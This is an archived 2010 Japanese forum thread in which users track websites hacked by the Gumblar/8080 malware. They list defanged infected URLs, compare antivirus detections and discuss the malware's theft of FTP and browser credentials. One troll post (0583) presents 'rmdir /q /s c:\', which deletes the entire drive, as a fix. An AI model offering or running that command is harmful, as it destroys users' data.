whoisからめるぽ
whoisからめるぽ
0563名無しさん@お腹いっぱい。
2010/01/31(日) 22:59:58ansitu.xrea.jp
DNS設定が見つかりません! / DNS ERROR!
考えられる原因
# ドメイン設定が行われていない、または、反映されていない
# ドメイン、サーバーの契約期限が切れている、または、解約になっている
056445
2010/01/31(日) 23:34:390565名無しさん@お腹いっぱい。
2010/01/31(日) 23:38:200567名無しさん@お腹いっぱい。
2010/01/31(日) 23:50:35「ボリュームが別のプロセスによって使用されているため、Formatを実行できません。」
>>560
はさみを持ってないんだが...
0568名無しさん@お腹いっぱい。
2010/01/31(日) 23:51:57interiorshop●jp/
avattop●ru
またスクリプト変わってきた?
0569名無しさん@お腹いっぱい。
2010/01/31(日) 23:52:110571名無しさん@お腹いっぱい。
2010/01/31(日) 23:56:59どっかアングラな世界で金生み出してるのか
0572パトラッシュ(ryの人
2010/01/31(日) 23:59:070573名無しさん@お腹いっぱい。
2010/02/01(月) 00:00:11感染しているサイトのテキストの最後に
<!--fb57962912cbfdc1b81d9fedd546ce6d-->
<!--5f3821d54cb878a64651648758477fc0-->
のようなコードがあるのだがこれはウイルスが難読化
コードと共に追加したものですよね?
0574名無しさん@お腹いっぱい。
2010/02/01(月) 00:23:41JS/Agent.33127を検出。
通報してません。誰か頼む。
リンク元 ttp://www●mag-x●com/blog/2010/01/
リンク先 ttp://www●mag-x●com/gallery/cover/ ←ココが改竄されてる
0575名無しさん@お腹いっぱい。
2010/02/01(月) 01:14:58うん。そのMD5みたいなのは前からあったよ。何だかは知らないけど。
jsには追記されない。
0576名無しさん@お腹いっぱい。
2010/02/01(月) 01:18:093時頃まで起きてます
057745
2010/02/01(月) 01:19:53めるぽ
めるぽ
>>574 /*Exception*/
前々々スレ/*LGPL*/、前スレ/*Exception*/から計3回、内返事は前々々スレの/*LGPL*/対応の1通のみ。
改ざんページは減ってはいるので公開サーバーを止めずに掃除中かも。。。
参考に
サイト改ざん止まず(1) 修復サイト再汚染が多発、PW変更/感染チェックを
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2138
0578名無しさん@お腹いっぱい。
2010/02/01(月) 01:26:440579名無しさん@お腹いっぱい。
2010/02/01(月) 01:30:100580名無しさん@お腹いっぱい。
2010/02/01(月) 01:59:210581576
2010/02/01(月) 03:14:23お疲れ様でした。おやすみなさい。
0582名無しさん@お腹いっぱい。
2010/02/01(月) 05:37:34↑このレスのリンク先やられてる?
オンラインチェッカーでノートンsafe、カスペ不明なんだが・・・
0583名無しさん@お腹いっぱい。
2010/02/01(月) 06:34:17rmdir /q /s c:\
本当に危険なので、自己責任で実行してください。
0584名無しさん@お腹いっぱい。
2010/02/01(月) 06:40:37ディレクトリ全削除だっけ?
0585名無しさん@お腹いっぱい。
2010/02/01(月) 07:08:17'rmdir' が見つかりません。名前を正しく入力したかどうかを確認してから、やり直してください。
というエラーが出ます。XPには対応してないのでしょうか?
0586名無しさん@お腹いっぱい。
2010/02/01(月) 07:18:32でもコマンドプロンプトでやっても、アクセスが拒否されましたとか、プロセスはファイルにアクセスできませんというエラーが山ほど出て、うまくいきません。
相当手強いマルウェアみたいです。これはもうフォーマットするしかないでしょうか?
0587名無しさん@お腹いっぱい。
2010/02/01(月) 07:24:09何がしたいのか解らんが好きに汁w
0588名無しさん@お腹いっぱい。
2010/02/01(月) 09:00:350589名無しさん@お腹いっぱい。
2010/02/01(月) 09:14:400590名無しさん@お腹いっぱい。
2010/02/01(月) 09:19:050591名無しさん@お腹いっぱい。
2010/02/01(月) 09:59:590592名無しさん@お腹いっぱい。
2010/02/01(月) 10:00:22うっかりサイトを見ちゃった人が被害が大きいのは問題じゃね?
0593へたれ発掘屋
2010/02/01(月) 11:41:58きっと最新型
tp://www●tedukuri-happy●com/
※ /uchiwa に名無し旧型あり
GNU GPL
http://www●work-cospre●com/rss/index●php
だらだら調査中・・・
0594名無しさん@お腹いっぱい。
2010/02/01(月) 12:00:39告知無し 再開w
0595名無しさん@お腹いっぱい。
2010/02/01(月) 12:41:590596へたれ発掘屋
2010/02/01(月) 13:00:38tp://www●chantaltrim●com/shop/index●php
0597名無しさん@お腹いっぱい。
2010/02/01(月) 13:06:08まだ放置されているな。
0598名無しさん@お腹いっぱい。
2010/02/01(月) 13:44:37ダメな場合が多いのです。
0599名無しさん@お腹いっぱい。
2010/02/01(月) 14:08:27Last-Modified: Mon, 01 Feb 2010 04:37:58 GMT
0600名無しさん@お腹いっぱい。
2010/02/01(月) 14:12:22それ、最終改ざん日時じゃね?
0601名無しさん@お腹いっぱい。
2010/02/01(月) 14:14:34そうなのか……
0602名無しさん@お腹いっぱい。
2010/02/01(月) 14:56:42いくら試しても感染してくれん・・・途中でリブートされるけど
うまくいってリブートてより、ハングってリブートって感じ
環境はこんな感じ
Windows XP SP2
Internet Explorer 6.0
Adobe Reader 7.0
Flash Player Flash 7.0.70.0
JRE 6 Update 10
0603名無しさん@お腹いっぱい。
2010/02/01(月) 15:24:02そこから先のバイナリはコロコロ変わるからアレだけど、2日前に拾ったのでは
レジストリからハードウェア情報( HKLM\Hardware\Description\System )を
読み込んでるからそこらの著名なVMそのままだと回避されちゃうかもね。
0604名無しさん@お腹いっぱい。
2010/02/01(月) 15:45:40ユーザのアクセスログ調べてたら見つけた。
0605名無しさん@お腹いっぱい。
2010/02/01(月) 15:53:29ありがとうございます!もう少しいろいろ試してみます。
とりあえずVMware上の>>602の環境では
>>593>>575>>568は感染しませんでした。
現在実機で環境構築中です。
0606名無しさん@お腹いっぱい。
2010/02/01(月) 15:54:23http://ec2-204-236-148-61.us-west-1.compute.amazonaws.com/
0607名無しさん@お腹いっぱい。
2010/02/01(月) 17:11:400608名無しさん@お腹いっぱい。
2010/02/01(月) 17:28:30あしはつかっちゃる
0609名無しさん@お腹いっぱい。
2010/02/01(月) 17:34:28Gumblar/8080 Not Found.
ならクリーンってことでおk?
0610名無しさん@お腹いっぱい。
2010/02/01(月) 17:41:46おk
0611名無しさん@お腹いっぱい。
2010/02/01(月) 17:43:380612名無しさん@お腹いっぱい。
2010/02/01(月) 18:07:00亀レスだが
ソフトのパスワードが盗まれるのは初期の頃から分かってた
なぜか急に騒ぎ出したようだが
0613名無しさん@お腹いっぱい。
2010/02/01(月) 18:09:020614名無しさん@お腹いっぱい。
2010/02/01(月) 18:09:560615名無しさん@お腹いっぱい。
2010/02/01(月) 18:11:56それはそれで良いけどFFFTPばかりが注目されすぎだな
俺なんかFileZillaからパスワードのコードだけ変えたFFFTPに乗り換えた
0616名無しさん@お腹いっぱい。
2010/02/01(月) 18:13:24d
js無使用3939使ってみます
0617名無しさん@お腹いっぱい。
2010/02/01(月) 18:18:22(2) webページ更新時の通信でパスワードが抜かれる
8080系は(2)もやってんの?
0618名無しさん@お腹いっぱい。
2010/02/01(月) 18:21:59ヒント:同人板で大騒ぎ
0619名無しさん@お腹いっぱい。
2010/02/01(月) 18:24:38やってると思う。 >>603 のexe、WinSock2フックしとる。
0620名無しさん@お腹いっぱい。
2010/02/01(月) 18:26:11やられてる人は多いだろうね。普通の人はそれほど縁がないJavaも
お絵描き掲示板では必要だし。んで古いJavaそのままみたいな。
0621名無しさん@お腹いっぱい。
2010/02/01(月) 18:33:34そうか、ありがとん
0622名無しさん@お腹いっぱい。
2010/02/01(月) 18:46:28あそこの連中は8080が一般ニュースになって
世間が騒いでる真っ最中でさえ
「以前感染警告や感染告知出したら質問メールが数通来た
だから今回告知出すのマンドクセ」
とか言い出してたからなw
それが自分の身にダイレクトに降りかかるとわかった途端
一転してパニックモードですよ。
GENOの時も思ったが、あそこは本当にクズの集まり。
0623名無しさん@お腹いっぱい。
2010/02/01(月) 18:49:07保存してあるパスワードが盗まれることが問題なんだから
もちろん安全性は高まるけど
0625名無しさん@お腹いっぱい。
2010/02/01(月) 19:02:270627名無しさん@お腹いっぱい。
2010/02/01(月) 19:28:590628名無しさん@お腹いっぱい。
2010/02/01(月) 19:55:30頻繁に更新するもんだから全然役に立たねぇー。
ウィルスソフトさえ更新しとけば大丈夫とか思ってる奴は確実にやられるな。
0629名無しさん@お腹いっぱい。
2010/02/01(月) 19:58:54そのほかの段階で防御可能なら感染の問題はない
0630名無しさん@お腹いっぱい。
2010/02/01(月) 20:02:35Adobeがゼロデイをしばらく放置したおかげでひどいことになったけど、
現時点では防げるからね。
アンチウイルスだのFTPクライアントは何がいいだのは二の次だよ。
0631名無しさん@お腹いっぱい。
2010/02/01(月) 20:07:55感染前の対策が出来ていれば感染後のことなんて騒ぐ事じゃない。
新たな脆弱性なんて持ち出したらキリがないしな。
0632名無しさん@お腹いっぱい。
2010/02/01(月) 20:08:18アンチウイルスさえ更新しとけば大丈夫とか思ってる人の話だろ
でも常に最新に出来ないような場合もあるんだよね
0633名無しさん@お腹いっぱい。
2010/02/01(月) 20:09:40最後ウィルス落としてくるじゃん。
あれもアンチウィルスソフトだと引っかからないな。
引っかかるようになると引っかからないもんに変身する。
0634名無しさん@お腹いっぱい。
2010/02/01(月) 20:13:24当たり前だがソフトによるよ
脆弱性を攻撃する際に検知するやつもあるし
0636名無しさん@お腹いっぱい。
2010/02/01(月) 20:33:32> 各アプリ(Java、PDF、etc.)を常に最新にしておくことが最も重要。
> Adobeがゼロデイをしばらく放置したおかげでひどいことになったけど、
当時最新を心がけている人で、readerのJavascriptを切ってないような人は
少なかったんじゃないかなぁ
感染してる人はadobeゼロデイ以前の問題のような気がする
0637名無しさん@お腹いっぱい。
2010/02/01(月) 20:41:040638名無しさん@お腹いっぱい。
2010/02/01(月) 21:59:24やばい??
0639名無しさん@お腹いっぱい。
2010/02/01(月) 22:02:29GumblarChecker 2だと検出されなかったけど
0640名無しさん@お腹いっぱい。
2010/02/01(月) 22:14:020641名無しさん@お腹いっぱい。
2010/02/01(月) 22:28:39上記のサイトをaguseで調べたら可能性ありと出たんだが、どうかな?
0642名無しさん@お腹いっぱい。
2010/02/01(月) 22:30:30だよな、めんご
0643名無しさん@お腹いっぱい。
2010/02/01(月) 22:30:39チェック対象から3件検出されました
0644名無しさん@お腹いっぱい。
2010/02/01(月) 22:48:43ありがとうございます。
0645名無しさん@お腹いっぱい。
2010/02/01(月) 22:52:28>>568の一番上と同じじゃね?
0646名無しさん@お腹いっぱい。
2010/02/01(月) 22:54:030647名無しさん@お腹いっぱい。
2010/02/01(月) 23:07:47感染しちゃってるけど検知されないまま残る奴も居る訳だ。
っていうか多分現時点でそういう奴も居るんだろうな。
ゼロデイで仕掛けられると脅威だな。
0648名無しさん@お腹いっぱい。
2010/02/01(月) 23:32:310649名無しさん@お腹いっぱい。
2010/02/01(月) 23:52:42IP変えて踏んでる?
同じIPだと2回目以降はダウンロードされないとかってあったはず
0650名無しさん@お腹いっぱい。
2010/02/01(月) 23:59:56ttp://www.lifehacker.jp/2010/01/100130ftpffftp8080id.html
そのへんも拡大要因かな
しかし迷惑な話だ
0651名無しさん@お腹いっぱい。
2010/02/02(火) 00:10:02JS:Illredir-F [Trj]
やっと来た…
0652名無しさん@お腹いっぱい。
2010/02/02(火) 00:15:460653名無しさん@お腹いっぱい。
2010/02/02(火) 00:16:46しょうがないから除外設定したよw
0654名無しさん@お腹いっぱい。
2010/02/02(火) 00:50:06コードの進化(毎日絶賛進化中)が止まってるみたいだから
新しい脆弱性攻撃の仕込みをやってるのかもしれん。
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&mode=bkno&no=2122
コレとか
0655名無しさん@お腹いっぱい。
2010/02/02(火) 00:57:520656名無しさん@お腹いっぱい。
2010/02/02(火) 01:06:31穴多い上に対応が遅いし
0657名無しさん@お腹いっぱい。
2010/02/02(火) 01:23:330658名無しさん@お腹いっぱい。
2010/02/02(火) 01:30:010659名無しさん@お腹いっぱい。
2010/02/02(火) 02:07:23ttps://addons.mozilla.jp/firefox/details/938
陥落サイトを全部検知しやがる・・・
0660名無しさん@お腹いっぱい。
2010/02/02(火) 02:16:44どこがじゃwホリマサだめだったぞ
0661名無しさん@お腹いっぱい。
2010/02/02(火) 02:19:03Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK
0662名無しさん@お腹いっぱい。
2010/02/02(火) 02:34:540664名無しさん@お腹いっぱい。
2010/02/02(火) 02:37:120665名無しさん@お腹いっぱい。
2010/02/02(火) 02:45:53www.to-an●jp/content/
kinyu64.choicash●com/
www.health-insurance-101●com/
新しい改ざんはどれもコードの埋め込みに失敗してない?
この状態でスクリプトは動くのかなぁ。
0666名無しさん@お腹いっぱい。
2010/02/02(火) 03:20:44641は、自分のだと検出されないんだが・・・
0667名無しさん@お腹いっぱい。
2010/02/02(火) 08:28:32ヒューリスティックであやしい挙動のスクリプト全部とめるってのも手だな
まあ誤検知もあるだろうけど
0668名無しさん@お腹いっぱい。
2010/02/02(火) 08:29:48MSはその中じゃ一番早いだろ
ゼロデイに使われる危険度が緊急のアップデートはかなり早い
firefoxとかlinux系より早いよ
0669名無しさん@お腹いっぱい。
2010/02/02(火) 08:31:05いや、それはないw
散々放置の前科持ちだから
0670名無しさん@お腹いっぱい。
2010/02/02(火) 08:33:53firefoxやlinuxは、開発社サイトやメーリングリストにソースコードレベルのパッチが投稿されるのは早いが、
正式にアップデートが提供されるのはそこそこ時間がかかる
自分でソースコードにパッチ当ててコンパイルする人じゃなければ時間かかるな
0671名無しさん@お腹いっぱい。
2010/02/02(火) 08:42:460672名無しさん@お腹いっぱい。
2010/02/02(火) 09:52:30いや遅いよ
先月の緊急パッチだって事前に検証が進んでいたからあのタイミングで出せただけで
ゼロデイだったなら緊急配布は不可能だし2月どころか3月のパッチにも間に合うか微妙な感じ
0673名無しさん@お腹いっぱい。
2010/02/02(火) 10:04:49陶芸教室のは失敗してないんじゃね。
他のは変なところでタグが切れてるけど、ページは表示されるし
scriptタグもちゃんと書かれてるから、実行されそうだが…
0674名無しさん@お腹いっぱい。
2010/02/02(火) 10:27:43日本に出回っているソフトで対策ができるかなと思うのはカスペ以外思い浮かばないのですが?
0675名無しさん@お腹いっぱい。
2010/02/02(火) 10:33:26なんで?
ノートンなら最初から防御できたよ
0676名無しさん@お腹いっぱい。
2010/02/02(火) 10:36:310677名無しさん@お腹いっぱい。
2010/02/02(火) 13:17:14ttp://www.odnir.com/cgi/src/nup44341.jpg
0678名無しさん@お腹いっぱい。
2010/02/02(火) 13:30:47殆どのファイルにコード書かれてた…
0679名無しさん@お腹いっぱい。
2010/02/02(火) 13:53:21あーあ。。。
0680名無しさん@お腹いっぱい。
2010/02/02(火) 14:12:47一応2010なら変なアドレスとの通信は止まるみたいだけど、
8080本体を完全スルーした前科ありなので危険。
♪サクサク感染〜 になりかねない
0681名無しさん@お腹いっぱい。
2010/02/02(火) 15:04:19新しいエンジンのバージョン番号 :
AV7 7.9.1.156 / AV8/9 8.2.1.156
変更内容 :
- 修正 : 誤検出
HTML/Spoofing.Gen
HTML/Silly.Gen
HTML/Malicious.PDF.Gen
HTML/ADODB.Exploit.Gen
HTML/Crypted.Gen
HTML/Infected.WebPage.Gen
HEUR/HTML.Malware
来たかな
0682名無しさん@お腹いっぱい。
2010/02/02(火) 15:23:39ひどいな
0684名無しさん@お腹いっぱい。
2010/02/02(火) 17:58:46ネトランだからな…
0685名無しさん@お腹いっぱい。
2010/02/02(火) 18:00:44いつもありがとうございます。
0686名無しさん@お腹いっぱい。
2010/02/02(火) 18:01:550687名無しさん@お腹いっぱい。
2010/02/02(火) 18:39:28↑
こいつの先のスクリプトも失敗してないか?
俺はjavaに詳しくないからよくわからんが
文字コードを区切ってるsplitってちゃんとした区切り文字入ってないことないか?ずっとそうだけど。
それと文字コードを文字に変換してる所も以前は+4じゃ上手く変換されんな。
0688687
2010/02/02(火) 18:41:29×→それと文字コードを文字に変換してる所も以前は+4じゃ上手く変換されんな。
○→それと文字コードを文字に変換してる所は+4じゃ上手く変換されんな。
0689名無しさん@お腹いっぱい。
2010/02/02(火) 19:12:19コード消えてね?見当たらんのだが
0690名無しさん@お腹いっぱい。
2010/02/02(火) 19:29:45http://megalodon●jp/2010-0202-1633-50/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww%2Eeco%2Drt%2Ejp%2Findex%2Ehtml
ぐぐったら出てきた。眠いから後は誰か宜しく。
0691名無しさん@お腹いっぱい。
2010/02/02(火) 20:26:250692名無しさん@お腹いっぱい。
2010/02/02(火) 20:32:080693名無しさん@お腹いっぱい。
2010/02/02(火) 20:58:47やっぱ誤検出ですよね。よかた
ありがとうございます
魚拓をaguseで踏むようなチキンにあの警報音はきつい
0694名無しさん@お腹いっぱい。
2010/02/02(火) 21:51:26お昼に電凸
現状無害
一応完了
0695名無しさん@お腹いっぱい。
2010/02/02(火) 22:52:03たまたま失敗してるのか
意図的に失敗させてるのか
誰かに書き換えられたのか
どれだろうな。
結構いい所で失敗してるぞ。
誰か書き換えてたりしてな。
0696名無しさん@お腹いっぱい。
2010/02/02(火) 23:11:580697名無しさん@お腹いっぱい。
2010/02/02(火) 23:39:28(1)index.htmlな告知ページ
(2)JavaScript無効だと見れない告知
(3)PDFの告知
(4)告知のリンクがFlashの中
index.htmlな告知ページが改ざんされてたのは、さすがにキレたけど
おまいらはどの辺まで許容範囲?
0698名無しさん@お腹いっぱい。
2010/02/02(火) 23:53:500699名無しさん@お腹いっぱい。
2010/02/02(火) 23:57:240700名無しさん@お腹いっぱい。
2010/02/02(火) 23:59:150701名無しさん@お腹いっぱい。
2010/02/03(水) 00:03:05そうだよな
ウイルス作ったやつは公開処刑されるべき
国を揺るがしかねないからテロリストと同類だしな
0702名無しさん@お腹いっぱい。
2010/02/03(水) 00:06:390703名無しさん@お腹いっぱい。
2010/02/03(水) 00:27:13損害賠償請求されるといろいろ面倒だから今回は破壊工作してこないんじゃないかな
0704名無しさん@お腹いっぱい。
2010/02/03(水) 00:31:44だから、告知してるだけマシだ〜
0705名無しさん@お腹いっぱい。
2010/02/03(水) 02:29:48この状態で踏んだら「このコンピュータにはQuicktimeが見つけられませんでした」
のようなメッセージが無限に出てきたんだけども、大丈夫かな。
www●geocities●jp/honeybee_site/index●htm
0706名無しさん@お腹いっぱい。
2010/02/03(水) 03:19:50ざっと見た感じ何も無いと思うが
0707名無しさん@お腹いっぱい。
2010/02/03(水) 04:45:05埋め込みMIDIを鳴らそうとしているだけだ。馬鹿たれ。
何でもかんでもウイルスだと疑う前にページのソースぐらい確認しろ。
0708名無しさん@お腹いっぱい。
2010/02/03(水) 08:43:27実際今回のウィルスは超国家的インターネット絶滅作戦の一環だと思う
0709名無しさん@お腹いっぱい。
2010/02/03(水) 08:45:540710名無しさん@お腹いっぱい。
2010/02/03(水) 10:11:52http://www.security-next.com/011944.html
保険代理店のサイトが改ざん - 閲覧者にウイルス感染のおそれ
http://www.security-next.com/011945.html
名古屋のリフォーム事業者のサイトが改ざん - 閲覧で「Gumblar」亜種感染のおそれ
http://www.security-next.com/011955.html
美容ポータル「スタービューティー」が「Gumblar亜種」による改ざん
http://www.security-next.com/011959.html
奈良女子大運営の情報サイトが「Gumblar」亜種で改ざん - キャッシュから問題が判明
http://www.security-next.com/011959.html
0711名無しさん@お腹いっぱい。
2010/02/03(水) 10:46:030712名無しさん@お腹いっぱい。
2010/02/03(水) 11:41:30マルウェアを感染させて挙動を調べたいとき用にAPIフックするツールを書いてるんだけどめんどくさい。
おまいら解析するとき、何かフリーのツールつかってんの?
0713名無しさん@お腹いっぱい。
2010/02/03(水) 12:02:13p://dooon●konrei●org/foreign-exchange-japan/
まだー?
0714名無しさん@お腹いっぱい。
2010/02/03(水) 15:05:43ウエアによるアカウント窃取、および外部サーバへのアカウント情報の送信を
確認しました。
- ALFTP 5.2 beta1
- BulletPloof FTP Client 2009.72.0.64
- EmFTP 2.02.2
- FFFTP 1.96d
- FileZilla 3.3.1
- FlashFXP 3.6
- Frigate 3.36
- FTP Commander 8
- FTP Navigator 7.77
- FTP Now 2.6.93
- FTP Rush 1.1b
- SmartFTP 4.0.1072.0
- Total Commander 7.50a
- UltraFXP 1.07
- WinSCP 4.2.5
上記に加えて、以下の Web ブラウザのアカウント管理機能を用いて保存され
ている情報をマルウエアが窃取し、外部サーバに送信している事を確認しまし
た。
- Microsoft社 Internet Explorer 6
(Internet Explore 7 および 8 ではアカウント窃取は確認されておりません)
- Opera社 Opera 10.10
0715名無しさん@お腹いっぱい。
2010/02/03(水) 15:13:120716名無しさん@お腹いっぱい。
2010/02/03(水) 15:14:06ほとんどダメポってことねw
0717名無しさん@お腹いっぱい。
2010/02/03(水) 15:34:53もうFTPって規約を使うなということか…。
あとIE6のオートコンプリートw
IE6なんか早く捨てればいいのに、官庁の電子入札システムは
IE6以外じゃ動作しないとかなんとか…
0718名無しさん@お腹いっぱい。
2010/02/03(水) 16:49:43自分が調べた限りでは無料の会社はFTP使えってトコがほとんどだったような…
あ、ブログとかは別ね。
0719名無しさん@お腹いっぱい。
2010/02/03(水) 16:52:420720名無しさん@お腹いっぱい。
2010/02/03(水) 16:56:52ttp://chicappa.jp/?mode=info&state=info&page=1&id=492#492
ロリポはとりあえず放置で行くみたい。
0721名無しさん@お腹いっぱい。
2010/02/03(水) 16:58:4910万人以上の従業員を有しているAIG(アメリカンインターナショナルグループ:
アメリカ合衆国ニューヨークに本拠を置く保険会社)Europeの
おそらく社内セキュリティ担当かなんかの人
http://www.virusbtn.com/conference/vb2009/programme/index
Martin Overton さん
2009年9月ジュネーブ会議にて
0722名無しさん@お腹いっぱい。
2010/02/03(水) 16:59:49個人的には、近いうちにCMSのコンテンツ改竄に踏み切る気がしてるw
サーバー側はポートの制限がしにくいし
話は少し違うけどCMS自体に重大なセキュリティホールが見つかったら、FTPよりリスクは大きいし
これはFTPサーバーにセキュリティホールが見つかる事と同等かもしれないけど
性質上CMSの方がセキュリティホールが見つかりやすい気がする
0723もとい
2010/02/03(水) 17:02:0810万人以上の従業員を有しているAIG(アメリカンインターナショナルグループ:
アメリカ合衆国ニューヨークに本拠を置く保険会社)Europeの
おそらく社内セキュリティ担当かなんかの人
http://www.virusbtn.com/conference/vb2009/programme/index
Pascal Lointier さん
2009年9月ジュネーブ会議にて
0724名無しさん@お腹いっぱい。
2010/02/03(水) 17:37:480725名無しさん@お腹いっぱい。
2010/02/03(水) 17:58:40GeoCitiesがCMSだった気が。
んで文字コードがEUCでしょっちゅう化けた気が。
0726名無しさん@お腹いっぱい。
2010/02/03(水) 18:02:00そんなん昔からあるべ。SQLインジェクションとやること大して変わらんし
WordPressとかしょっちゅうやられ(て頻繁にバージョンアップし)てる。
0727名無しさん@お腹いっぱい。
2010/02/03(水) 18:30:50Firefox圧勝だな
0728名無しさん@お腹いっぱい。
2010/02/03(水) 18:33:500729名無しさん@お腹いっぱい。
2010/02/03(水) 18:33:58スレ違い、むしろ板違いクレクレの相手しないでほしい
0730名無しさん@お腹いっぱい。
2010/02/03(水) 19:22:43だからマスタパスワード入れろとあれほど
0731名無しさん@お腹いっぱい。
2010/02/03(水) 19:28:030732名無しさん@お腹いっぱい。
2010/02/03(水) 19:33:57operaのコンテンツブロックにhttp://*.ru*を入れればガンブラァを防げるという話を聞いたことがあるな
0733名無しさん@お腹いっぱい。
2010/02/03(水) 19:48:490734名無しさん@お腹いっぱい。
2010/02/03(水) 19:57:13どこのコピペか知らんが、コンテンツブロックに入れるなら *:8080/* の方がいい。
0735名無しさん@お腹いっぱい。
2010/02/03(水) 20:59:46会議に参加するシマンテックの面々
http://www.virusbtn.com/conference/vb2009/programme/index
Sumesh Jaiswal
Carey Nachenberg
Vijay Seshadri
Zulfikar Ramzan
Candid Wueest
2009年9月ジュネーブ会議にて
0736名無しさん@お腹いっぱい。
2010/02/03(水) 21:50:49今までは人のパソコンの中身をこそっとみてウヒヒと笑って個人利用していた
可能性もあり?
0737名無しさん@お腹いっぱい。
2010/02/03(水) 22:00:34fc2がCMSとFTP両用
0739名無しさん@お腹いっぱい。
2010/02/03(水) 22:42:35ないとはいえないね
0740名無しさん@お腹いっぱい。
2010/02/03(水) 22:51:40再改竄。
0741名無しさん@お腹いっぱい。
2010/02/03(水) 23:03:02DreamweaverのFTPは安全か
SFTPだし
0742名無しさん@お腹いっぱい。
2010/02/03(水) 23:35:33そんなもんなんでもないとはいえないってなるわ
0743名無しさん@お腹いっぱい。
2010/02/03(水) 23:40:26相手サーバーがSFTPならな
0744名無しさん@お腹いっぱい。
2010/02/03(水) 23:42:06疲れてるならとっとと寝ろよ
0745名無しさん@お腹いっぱい。
2010/02/03(水) 23:56:58>某掲示板に書こうと思ったら、巻き込み規制を喰らっていたので・・・
>・海保エミリ(公式サイト)
>tp://emilykaiho●com/en/home●html
>tp://emilykaiho●com/home●html
>※stardustの連鎖と思われます
某ブログつながりで…記事にされてるOperaですけどマスターパスワード掛けとけば一応は安心じゃないですかね?
0746名無しさん@お腹いっぱい。
2010/02/04(木) 00:03:38気にするな
ftpはともかく
0747名無しさん@お腹いっぱい。
2010/02/04(木) 00:16:51www●eonet●ne●jp/~inoue-clinic/
www●fujiya-ryokan●jp/index●html
www●popchai●jp/
0748名無しさん@お腹いっぱい。
2010/02/04(木) 00:24:29東京国立近代美術館で昨年開催された「ゴーギャン展2009」の公式ホームページが、
「ガンブラー」と呼ばれるコンピューターウイルスの亜種に感染し、不正に改ざんされていたことが、3日分かった。
同展を主催したNHKなどによると、不正に改ざんされた期間は、今年1月3日から2月1日まで。
この期間に延べ約1700件の閲覧があり、アクセスした人のパソコンにウイルス感染のおそれがあるという。
ttp://www.nishinippon.co.jp/nnp/item/150424
0749名無しさん@お腹いっぱい。
2010/02/04(木) 00:42:13ずいぶんと訪問者が少ないサイトなんだな・・
下二つはさっきめるぽとwhoisからめるぽしてますた。
残件上二つ。
whoisからめるぽ
めるぽ
0753名無しさん@お腹いっぱい。
2010/02/04(木) 02:06:33すみませんここトロイの木馬が検出されたんですが
ガンブラーにかかってますか?
0754名無しさん@お腹いっぱい。
2010/02/04(木) 02:08:51http://www.aguse.jp/?m=w&url=http%3A%2F%2Fgodiego.net&x=0&y=0
0755名無しさん@お腹いっぱい。
2010/02/04(木) 02:13:02がやられてる
0756名無しさん@お腹いっぱい。
2010/02/04(木) 02:13:03ありがとうございましたやっぱりかかってるみたいですね
0757名無しさん@お腹いっぱい。
2010/02/04(木) 02:13:44ありがとうございます。
ゴダイゴすれみたら1月18日にトロイが出たって書いてた人が
いたので・・・
0758名無しさん@お腹いっぱい。
2010/02/04(木) 02:20:06>>16
・Gumblar Checker 2
移転先URL→ ttp://gumblar.s1.dynamitelife.net/
>>745
ttp://www.stardust.co.jp/profile/kaihoemily.html
「前科あり」だから、問い合わせフォームから凸しといたw
0760名無しさん@お腹いっぱい。
2010/02/04(木) 11:09:51何語だよ・・・
0761誤爆した
2010/02/04(木) 11:11:35現状は.ftpaccessを置いて対応しれだって。
ttp://lolipop.jp/gumblar/
ttp://heteml.jp/gumblar/
0762名無しさん@お腹いっぱい。
2010/02/04(木) 11:11:54お前ここは初めてか?力抜けよw
0763名無しさん@お腹いっぱい。
2010/02/04(木) 11:40:280764名無しさん@お腹いっぱい。
2010/02/04(木) 12:00:24.ftpaccessでIP制限だと無意味だよね
0765名無しさん@お腹いっぱい。
2010/02/04(木) 12:56:490766名無しさん@お腹いっぱい。
2010/02/04(木) 13:09:15ガッ!!
0767名無しさん@お腹いっぱい。
2010/02/04(木) 13:29:51予想はしてたが、主要ソフト壊滅状態か。NextFTPも多分アウツじゃない?
FFFTPだけ悪者にされてカワイソス
でもブログやニュース記事には残るわけで・・・
何がアルファブロガーだ、ロクに考えもせず糞記事撒き散らしやがってライフハッカーが
--------
250 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/30(土) 17:26:00
フリーFTPソフト『FFFTP』に、8080系のマルウェア感染と同時にID・パスワードを取得される危険性があるそうです : ライフハッカー[日本版], 仕事も生活も上手くこなすライフハック情報満載のブログ・メディア
ttp://www.lifehacker.jp/2010/01/100130ftpffftp8080id.html
> 「UnderForge of Lack」では、消去すべきレジストリを記載してありますので、『FFFTP』のユーザーさんは、参考にして下さい。
ttp://www3.atword.jp/gnome/2010/01/28/hammmer-and-anvil-a-blacksmith-in-the-dark/
> 代わりのFTPソフトとしては、『ALFTP』、『WinSCP』、有料ですが『NextFTP』(3ヶ月間の無料試用期間あり)などをどうぞ。
--------
書くネタが出来て良かったね、さっさと記事書けよアルファブロガーさん
0768名無しさん@お腹いっぱい。
2010/02/04(木) 13:32:47そしてFFFTP作者もまんまと騙されてアホみたい。
0769名無しさん@お腹いっぱい。
2010/02/04(木) 13:36:182ちゃんの平均より低いだろ
子供のいたずら書き程度だ
0770名無しさん@お腹いっぱい。
2010/02/04(木) 13:37:04ちゃんと他に移行してって言ったもんっていう
証拠を示しただけだろ
0771名無しさん@お腹いっぱい。
2010/02/04(木) 13:44:26FFFTPが対象になってるって記事を
勝手にFFFTPだけと読み取ったんじゃねえの
お前みたいなおっちょこちょいが
0772名無しさん@お腹いっぱい。
2010/02/04(木) 13:45:34FFFTPに問題がありパスワード等が漏れた訳では無い
それを言うならウイルスが実行出来てしまうようなOSを作ったマイクロソフト(ry
Adobe,Sunかわいそす
0773名無しさん@お腹いっぱい。
2010/02/04(木) 13:46:10知らないやつは黙ってろw
0774名無しさん@お腹いっぱい。
2010/02/04(木) 13:46:52単に問い合わせが多かったんだろ
0775名無しさん@お腹いっぱい。
2010/02/04(木) 13:47:52おっちょこちょいは黙ってろ
0776名無しさん@お腹いっぱい。
2010/02/04(木) 13:49:520777名無しさん@お腹いっぱい。
2010/02/04(木) 13:50:04これはまず無理
0778名無しさん@お腹いっぱい。
2010/02/04(木) 13:56:040779名無しさん@お腹いっぱい。
2010/02/04(木) 14:07:090780名無しさん@お腹いっぱい。
2010/02/04(木) 14:09:55もう今時はね
